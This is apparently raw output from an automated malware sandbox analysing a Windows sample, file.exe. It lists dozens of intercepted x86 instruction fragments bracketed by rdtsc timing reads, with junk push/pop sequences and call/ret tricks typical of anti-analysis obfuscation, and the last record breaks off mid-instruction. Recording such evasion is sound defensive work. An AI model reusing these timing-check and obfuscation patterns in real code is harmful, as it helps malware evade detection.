Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DA8E6 second address: 9DA8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7448D39FF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DAEBB second address: 9DAEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DB1B3 second address: 9DB1BD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DB1BD second address: 9DB1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DB1C3 second address: 9DB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DB2F0 second address: 9DB2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB2F9 second address: 9DB2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBE29 second address: 9DBE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F74491B01D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF56 second address: 9DBF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 js 00007F7448D3A00Fh 0x0000000d jmp 00007F7448D3A009h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF7C second address: 9DBF86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF86 second address: 9DBFD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F7448D39FF6h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F7448D3A00Bh 0x00000021 jmp 00007F7448D3A005h 0x00000026 push edi 0x00000027 jg 00007F7448D39FF6h 0x0000002d pop edi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBFD0 second address: 9DBFD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC172 second address: 9DC178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC436 second address: 9DC445 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1014 second address: 9E1030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7448D3A000h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1030 second address: 9E1035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1035 second address: 9E103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E000C second address: 9E0016 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0016 second address: 9E002A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7448D39FFAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADCA0 second address: 9ADCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADCAA second address: 9ADCB4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7448D39FF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6075 second address: 9E609B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F74491B01D6h 0x0000000a jp 00007F74491B01D6h 0x00000010 jo 00007F74491B01D6h 0x00000016 popad 0x00000017 push edx 0x00000018 jmp 00007F74491B01DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E609B second address: 9E60D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F7448D3A00Eh 0x0000000b jmp 00007F7448D3A006h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F7448D39FFCh 0x0000001b jl 00007F7448D39FF8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E60D5 second address: 9E60DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E60DB second address: 9E60E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E66AD second address: 9E66D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F74491B01D6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E66D5 second address: 9E66DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6878 second address: 9E687E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E687E second address: 9E6887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA1BC second address: 9EA1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F74491B01D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F74491B01E7h 0x00000018 jnc 00007F74491B01D6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA1ED second address: 9EA1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA319 second address: 9EA31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA31D second address: 9EA321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA3C1 second address: 9EA3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAA6F second address: 9EAA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAB6E second address: 9EAB80 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F74491B01DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAB80 second address: 9EAB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7448D3A007h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAD18 second address: 9EAD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB037 second address: 9EB03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB03B second address: 9EB057 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB057 second address: 9EB06B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F7448D39FF6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB06B second address: 9EB071 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB071 second address: 9EB076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF37 second address: 9EBF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF3B second address: 9EBF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF41 second address: 9EBF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF47 second address: 9EBF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED13A second address: 9ED154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED820 second address: 9ED824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1077 second address: 9F1084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F74491B01D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1B40 second address: 9F1B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F7448D3A011h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5DA3 second address: 9F5DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5DA7 second address: 9F5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F7448D3A000h 0x0000000d nop 0x0000000e mov ebx, dword ptr [ebp+122D2D01h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7448D39FF8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push edi 0x00000031 pop edi 0x00000032 mov ebx, dword ptr [ebp+122D18A8h] 0x00000038 push 00000000h 0x0000003a mov edi, 47A750D7h 0x0000003f push eax 0x00000040 pushad 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6FD4 second address: 9F701C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F74491B01E9h 0x0000000e nop 0x0000000f movsx edi, cx 0x00000012 push 00000000h 0x00000014 mov edi, 103E8E64h 0x00000019 push 00000000h 0x0000001b mov bx, E7B1h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F74491B01E3h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F79 second address: 9F5F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F701C second address: 9F7022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7022 second address: 9F7026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F7D second address: 9F5F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5F83 second address: 9F5FA2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7448D39FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7448D39FFAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FA2 second address: 9F5FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FA6 second address: 9F5FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F71BD second address: 9F71CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F74491B01D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5FAC second address: 9F5FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8194 second address: 9F8198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA14D second address: 9FA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8198 second address: 9F81BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007F74491B01E2h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F74491B01D6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA151 second address: 9FA164 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F7448D39FF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA164 second address: 9FA187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01E5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB1A0 second address: 9FB1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA2D8 second address: 9FA393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F74491B01E0h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 jns 00007F74491B01DEh 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F74491B01D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov ebx, 66BD42E0h 0x0000003f adc edi, 7FDDC78Dh 0x00000045 mov eax, dword ptr [ebp+122D0029h] 0x0000004b jne 00007F74491B01DCh 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F74491B01D8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d mov dword ptr [ebp+122D21A5h], edx 0x00000073 mov edi, dword ptr [ebp+122D2A11h] 0x00000079 nop 0x0000007a pushad 0x0000007b jmp 00007F74491B01E1h 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA393 second address: 9FA3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D39FFDh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3AD second address: 9FA3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC206 second address: 9FC20B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3B1 second address: 9FA3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC20B second address: 9FC21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F7448D39FFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3B7 second address: 9FA3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC21D second address: 9FC221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC221 second address: 9FC2A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F74491B01D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D2C59h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F74491B01D8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 push 00000000h 0x00000048 add di, 8110h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F74491B01E2h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC2A1 second address: 9FC2A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC2A7 second address: 9FC2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4CF second address: 9FC4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF353 second address: 9FF378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E9h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF378 second address: 9FF37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00447 second address: A00454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F74491B01DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF540 second address: 9FF544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF544 second address: 9FF548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0330F second address: A03313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03313 second address: A03317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A024F2 second address: A024FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03317 second address: A03388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F74491B01D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2494h], eax 0x0000002a push 00000000h 0x0000002c adc bl, FFFFFFB1h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F74491B01D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov edi, esi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 